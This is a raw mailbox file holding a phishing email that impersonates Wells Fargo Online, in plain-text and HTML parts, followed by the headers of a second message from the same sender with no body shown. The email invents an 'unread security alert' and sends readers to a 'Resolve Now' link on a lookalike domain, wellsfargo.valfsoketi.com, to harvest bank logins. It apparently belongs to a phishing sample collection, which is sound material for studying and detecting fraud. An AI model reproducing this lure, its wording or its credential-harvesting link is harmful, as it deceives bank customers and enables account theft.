From: "Wells Fargo Online" <alerts.wellsfargo@email.com>
Date: Tue, 15 Aug 2017 16:43:02 -0500
Return-Path: alerts.wellsfargo@email.com
Message-ID: <LEMP-ANTHONY-DCPNTA000056b2@Lemp-Anthony-DC.Lemp-Anthony.com>
X-OriginalArrivalTime: 15 Aug 2017 21:43:02.0629 (UTC) FILETIME=[7886B150:01D3160F]
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 282

You will not see this in a MIME-aware mail reader.
--===============0936491003==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


    =

    =

   =

   =

    =

    	 Replies to this email are not monitored	  =

	  =

  =

   =

   =

    =

      =


	  =

    	  =

   =

    =


	 Dear Valued Customer,

You have 1 unread security alert in your account!

Resolve the problem to have full access back on your account.

<a href =3D 'https://www.connect.secure.wellsfargo.valfsoketi.com/auth/logi=
n/present/'; return false;" >Resolve Now

A copy of this notice will be available in your online statement.

Yours Sincerely,
Wells Fargo Online
	  =

   =

    =

    	 =

	 =20
--===============0936491003==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><table id=3D"wrapper" style=3D"letter-spacing: norma=
l; orphans: auto; text-indent: 0px; text-transform: none; widows: auto; wor=
d-spacing: 0px; -webkit-text-stroke-width: 0px; font-family: Arial, sans-se=
rif; table-layout: fixed; background-color: rgb(255, 255, 255);" border=3D"=
0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;" align=3D"center" bgc=
olor=3D"#E9E9E9">
<table class=3D"inner" align=3D"center" border=3D"0" cellpadding=3D"0" cell=
spacing=3D"0" width=3D"570">
<tbody>
<tr>
<td class=3D"spacer" style=3D"color: black; border-collapse: collapse;" hei=
ght=3D"20">&nbsp;</td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" height=3D"5" bgcolor=3D"#FCFCFC">&nbsp;</td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse;" bgcolor=3D"#FCFCFC">
<table class=3D"inner" align=3D"left" border=3D"0" cellpadding=3D"0" cellsp=
acing=3D"0" width=3D"570">
<tbody>
<tr>
<td class=3D"spacer" style=3D"color: black; border-collapse: collapse;">
<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"261">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" width=3D"7">&nbsp;</td>
<td class=3D"spacer" style=3D"color: rgb(153, 153, 153); border-collapse: c=
ollapse; font-family: Verdana, Geneva, sans-serif; font-size: 10px;" align=
=3D"left" height=3D"19" valign=3D"middle" width=3D"194">Replies to this ema=
il are not monitored</td>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" width=3D"7">&nbsp;</td></tr></tbody></table></td>
<td style=3D"color: black; border-collapse: collapse;">&nbsp;</td></tr></tb=
ody></table></td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" height=3D"5" bgcolor=3D"#FCFCFC"><img src=3D"http://f.email.b=
arclays.co.uk/i/11/268733543/spacer.gif" alt=3D"" style=3D"display: block;"=
 height=3D"10" border=3D"0" width=3D"10" /></td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" height=3D"6">&nbsp;</td></tr></tbody></table></td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse;" align=3D"center" bgc=
olor=3D"#E9E9E9">
<table class=3D"inner" align=3D"center" border=3D"0" cellpadding=3D"0" cell=
spacing=3D"0" width=3D"570">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;" bgcolor=3D"#FFFFFF">
<table class=3D"inner" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wid=
th=3D"570">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;">&nbsp;&nbsp; <img sr=
c=3D"http://a248.e.akamai.net/f/248/1856/90m/www.wellsfargo.com/img/header/=
logo_62sq.gif" height=3D"62" width=3D"62" /><br /><br /></td>
<td style=3D"color: black; border-collapse: collapse;">
<table class=3D"widthauto" align=3D"right" border=3D"0" cellpadding=3D"0" c=
ellspacing=3D"0" width=3D"392">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;">&nbsp;</td>
<td style=3D"color: black; border-collapse: collapse;" width=3D"14">&nbsp;<=
/td></tr></tbody></table></td></tr></tbody></table></td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse;" bgcolor=3D"#FFFFFF">
<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" width=3D"10">&nbsp;<br /><br /></td>
<td style=3D"color: black; border-collapse: collapse;"><font face=3D"Verdan=
a" size=3D"2">Dear Valued Customer,<br /><br /></font><span style=3D"color:=
 rgb(0, 0, 0); font-family: Verdana; font-size: small; font-style: normal; =
font-variant: normal; font-weight: normal; letter-spacing: normal; line-hei=
ght: normal; orphans: auto; text-align: start; text-indent: 0px; text-trans=
form: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text=
-stroke-width: 0px; float: none; display: inline !important; background-col=
or: rgb(255, 255, 255);">You have 1 unread security alert in your account!<=
br /><br />Resolve the problem to have full access back on your account.<br=
 /><br /><a href =3D 'https://www.connect.secure.wellsfargo.valfsoketi.com/=
auth/login/present/'; return false;" >Resolve Now</a><br /><br />A copy of =
this notice will be available in your online statement.<br /><br />Yours Si=
ncerely,<br />Wells Fargo Online<br /></span></td>
<td style=3D"color: black; border-collapse: collapse; font-size: 1px; line-=
height: 1px;" width=3D"10">&nbsp;</td></tr></tbody></table></td></tr></tbod=
y></table></td></tr>
<tr>
<td style=3D"color: black; border-collapse: collapse;" align=3D"center" bgc=
olor=3D"#E9E9E9">
<table class=3D"inner" align=3D"center" border=3D"0" cellpadding=3D"0" cell=
spacing=3D"0" width=3D"570">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;" bgcolor=3D"#FFFFFF">
<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%">
<tbody>
<tr>
<td style=3D"color: black; border-collapse: collapse;" width=3D"18">&nbsp;<=
/td>
<td style=3D"color: black; border-collapse: collapse;"><br /></td>
<td style=3D"color: black; border-collapse: collapse;" width=3D"18">&nbsp;<=
/td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></tabl=
e></html>
--===============0936491003==--

From jose@monkey.org Tue Aug 15 22:30:38 2017 +0000
Return-Path: alerts.wellsfargo@email.com
Delivered-To: jose@monkey.org
X-FDA: 73177083756.23.burst46_228ce7fceba5b
X-Spam-Summary: 64,4,0,24865b83dbb4f589,d41d8cd98f00b204,alerts.wellsfargo@email.com,:,RULES_HIT:2:41:72:355:379:455:581:962:967:969:973:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1325:1345:1381:1431:1432:1433:1434:1436:1437:1516:1517:1518:1535:1559:1571:1575:1588:1592:1594:1606:1685:1710:1714:1730:1777:1792:2107:2194:2198:2199:2200:2525:2527:2561:2566:2682:2685:2693:2741:2859:2890:2894:2901:2933:2937:2939:2942:2945:2947:2951:2954:2975:2976:3000:3022:3138:3139:3140:3141:3142:3148:3865:3866:3867:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:3976:4042:4118:4321:4603:4605:5007:6636:6669:6688:7801:8568:8599:8603:9025:9040:9121:9149:9203:9388:9908:10004:10049:10214:10346:10974:11233:11657:11658:11914:12043:12555:12903:12963:12973:12986:13163:13229:13236:13237:13439:14096:14827:21063:21067:21080:21212:21433:21450:21451:21524:21627:30001:30022:30026:30054:30055:30064:30079,0,RBL:63.232.120.195:@email.com:.lbl8.mailshell.net-62.20.0.100 64.201.201.201,CacheIP:none,Baye
X-HE-Tag: burst46_228ce7fceba5b
X-Filterd-Recvd-Size: 7462
Received: from StanServer2.domain.local (63-232-120-195.dia.static.qwest.net [63.232.120.195])
	by imf05.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 15 Aug 2017 22:30:37 +0000 (UTC)
Received: from StanServer2.domain.local ([192.168.1.1]) by StanServer2.domain.local with Microsoft SMTPSVC(7.5.7601.17514);
	 Tue, 15 Aug 2017 15:30:38 -0700
Content-Type: multipart/alternative; boundary="===============0057759210=="
MIME-Version: 1.0
Subject: Alert: You have unread security message
To: jose@monkey.org
